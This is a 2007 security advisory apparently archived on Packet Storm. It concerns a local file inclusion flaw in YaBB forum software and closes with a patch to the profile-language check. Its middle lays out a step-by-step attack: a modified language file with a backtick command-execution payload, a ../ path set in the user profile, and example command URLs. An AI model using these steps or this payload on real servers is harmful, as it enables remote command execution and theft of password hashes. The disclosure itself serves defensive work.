exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

yabb-lfi.txt

yabb-lfi.txt
Posted Jun 20, 2007
Authored by krasza | Site krasza.int.pl

YaBB versions 2.1 and below suffer from a local file inclusion vulnerability that allows for remote code execution.

tags | exploit, remote, local, code execution, file inclusion
SHA-256 | af958fb5a94edadc7e8f93f91b70ddb2da76329318f1774e91870c90573fdf8e

yabb-lfi.txt

Change Mirror Download
Local File Include Vulnerabilities

Problem: Local File Include Vulnerabilities
Product: YaBB <= 2.1(all version)
Web page:http://www.yabbforum.com/

Credit:Maciej `krasza` Kukla
@mail:krasza@gmail.com
homepage:www.krasza.int.pl

1.Description

"YaBB is a leading free forum software package that rivals any professional message board out there. It provides a real-time chat and support system for your visitors. While chat programs allow people to talk directly, you have to be on at the same time as others. With forum software like YaBB, you can talk any time, and everyone can join in the conversation! Build a community and get visitors to come back for interesting discussions, fun chit chat, or needed support without having to spend thousands of dollars."

http://www.google.pl/search?q=Powered+by+YaBB => 1,640,000 clients

2. Local File Include

I found many bugs like it in this board.Bugs relate one special variable for user($language, you can edit this variable in your profile). Examples, where I found bugs:

---Sources/HelpCentre.pl:139---
if (-e ("$helpfile/$language/$help_area/$line.help")) {
require "$helpfile/$language/$help_area/$line.help";
}
---end---

---Sources/Subs.pl:1529---
if (-e "$langdir/$use_lang/$what_to_load.lng") {
require "$langdir/$use_lang/$what_to_load.lng";
}
---end---

---Sources/ICQPager.pl:21---
if ($language) { require "$langdir/$language/ICQ.lng"; }
---end---

---Sources/Post.pl:1838---
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }
---end---

---Sources/Post.pl:1863---
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }
---end---

---Sources/Post.pl:1880---
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }
---end---

---Sources/InstantMessage.pl:1080---
if (-e "$langdir/$actlang/InstantMessage.lng") { require "$langdir/$actlang/InstantMessage.lng"; }
---end---

---Sources/InstantMessage.pl:1082---
if (-e "$langdir/$actlang/InstantMessage.lng") { require "$langdir/$actlang/Main.lng"; }
---end---

You can set this variable in profile's module.Thanks to uses the "../" characters, You can read other user's files(where is hash of password), exec other perl's script(so exec your code) etc.

Example 'plan of attacking' page, where is YaBB's forum(exec your command on server):

1.Find web, where is YaBB's forum(example 'http://victim.com/~krasza/yabb2/')
2.Modify your local's folder 'English' (from YaBB's packet)
English/HelpCentre.lng
---
%helptxt = (
'1' => "Help Section",
'2' => "Contents",
---

change for:

---
$content="<br><br><br><br><font color=red>";
$content.=`$INFO{'cmd'}`;
$content.="</font><br><br><br><br>";
%helptxt = (
'1' => "Help Section",
'2' => $content,
---

3.Copy your local's folder 'folder' to your account on attack's server(victim.com)
4.Create a new user(example 'attacker') on attack's forum(' http://vicitm.com/~krasza/yabb2/')
5.Edit your profile and set 'userlangue' on "../../path/your/folder/where/is/English's/folder/"(I propose you use 'Tamper Data'-plugin for Firefox);
6.Go to 'Help' on Yabb's page in your browser ('http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help');
7.Now Thanks to 'cmd' var, You can exec your command, example:

http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help&cmd=whoami returns 'nobody'(red color) on top in left frame.
http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help&cmd=uname%20-a returns 'Linux thrall 2.4.31 #21 Sun Jun 5 19:19:51 PDT 2005 i686 unknown unknown GNU/Linux '
etc.


3.Exploits:

If you much want to look exploit for this bug, I will can publish my code. I don't prefer publish my exploits. I think, that 'plan of attacking page' should suffice you.


4.Fix:

YaBB must filter language's var in profile's module.Until YaBB company will publish oficial fix, You should edit Sources/Profile.pl by this means:

---Sources/Profile.pl:1225---
if ($member{'userlanguage'} !~ m^\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\.\,\@/]+\Z^ && $member{'userlanguage'} ne "") { &fatal_error($profile_txt{'815'}); }
---end---

change for:

---Sources/Profile.pl:1225---
if ($member{'userlanguage'} !~ m^\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\.\,\@]+\Z^ && $member{'userlanguage'} ne "") { &fatal_error($profile_txt{'815'}); }
---end---

This version will deny injecting slash '/'.



Maciej `krasza` Kukla
krasza@gmail.com
www.krasza.int.pl

http://www.krewniacy.pl

--
Best regards, Maciej `krasza` Kukla
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close